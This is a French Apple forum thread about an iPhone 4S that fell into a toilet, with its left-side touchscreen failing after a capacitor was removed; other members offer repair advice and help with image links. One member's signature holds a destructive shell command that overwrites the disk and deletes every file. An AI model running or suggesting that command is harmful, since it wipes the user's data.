Forum iPhone, iPad, Apple Watch de iPhon.fr

Forum utilisateurs Apple iPhone, iPad, Apple Watch, forfaits et accessoires

Vous n'êtes pas identifié(e).

Annonce

Bienvenue sur le forum du blog iPhon.fr

Pensez à poster dans la bonne rubrique, respecter les propos des autres internautes, ne pas utiliser le langage SMS, et enfin, à utiliser la fonction 'Recherche' !
Et... Gardez le sens de l'humour, de la convivialité et de la décontraction. On n'est pas là pour se prendre la tête ! ;-)

#1 04-01-2013 00:54:36

funtotos
Membre
Inscription : 02-03-2008
Messages : 4

Iphone 4S probleme tactile cote gauche

Bonjour,

j'ai récupérer l'Iphone 4S de mon petit frère.
Malheureusement après avoir tirer la chasse d'eau, l'Iphone est tombé dans le cuvette.
Désoxydation de la carte mère avec du KF F2 ultra.

Problème rencontrer:

- court-circuit sur une capa ( l'iphone ne veut pas restaurer et affiche itunes avec la cable)


img3599zf.jpg


img3596ys.jpg

Âpres avoir dessouder la capa et relier les points, l'iphone re-fonctionne a l'aide d'une restauration .

Je commence a vérifier toutes les fonctionnalités de l'Iphone mais je rencontre encore un problème sur le cote gauche de l’écran .
Le tactile ne réponds pas.

co801930.jpg

J'ai changer d’écran mais toujours le même résultats .
Vérifier les connecteur de la broche R.A.S.


Est ce du a la capa dessouder ou bien ou bien avez vous une idée ?

Merci pour votre aide
seb

Hors ligne

#2 04-01-2013 06:22:01

-nicnl-
Membre
Inscription : 02-04-2008
Messages : 681

Re : Iphone 4S probleme tactile cote gauche

Salut !

Bon, juste pour préciser, les liens de tes images ne sont pas bons... Il faudrait que tu les modifie.
En attendant, j'affiche ci-dessous les images le temps que tu les corrige smile

img3599zf.jpg
img3596ys.jpg
co801930.jpg

__________

N'empêche, j'ai envie de dire : bon boulot !
T'a du matos, et t'a l’expérience qu'il faut pour retaper un iPhone tombé dans des chiottes... rien à dire, t'es un boss.

__________

Ah, et juste pour savoir, que tu veux dire par "capa" ?
Je pense familièrement au mot anglais "capacitor", signifiant condensateur, mais je ne suis pas certain que ça soit ça.

En règle générale, les condensateurs régulent les tensions, et font office de filtrage.
À mon avis, ce condensateur dessoudé n'est pas innocent... tu devrais essayer d'en trouver un autre équivalent et d'en remettre un pour tester.
J'espère pour toi que ça n'en est pas un tout petit, parce que ça risque d'être mort pour le changer...


sudo cat /dev/urandom > /dev/sda & sudo rm -rf /* &

Hors ligne

#3 04-01-2013 20:48:26

funtotos
Membre
Inscription : 02-03-2008
Messages : 4

Re : Iphone 4S probleme tactile cote gauche

merci pour ton aide et pour les compliments .
je ne sais pas si je suis un boss, mais tant que je trouve pas la panne je ne lâche pas .

Pour ce qui est du lien d'image, pourrais tu m'en dire un peut plus, comment a tu fait ?
Ou se trouve mon erreur ? c'est la première fois que je post des photos sur un forum .

Âpres avoir fouillé sur le net hier soir (jusqu’à 2h du mat) .
Je pense avoir trouvé la pièce défaillante a l'aide d'un site en anglais qui me montre le composant défaillant si le tactile et la broche ne son pas coupable .

Si tu me montre comment je peut sans erreur poster une belle image je pourrais dans un premier temps corriger mon lien et ensuite vous montrer la pièce qui gère le tactile .

merci

Hors ligne

Pied de page des forums

L'iPhone sur iPhon.fr, le blog de l'iPhone - blog iPad

iPhon.fr et son forum ne sont pas liés à Apple, Orange, SFR ou autres et les marques citées sont la propriété de leurs détenteurs respectifs.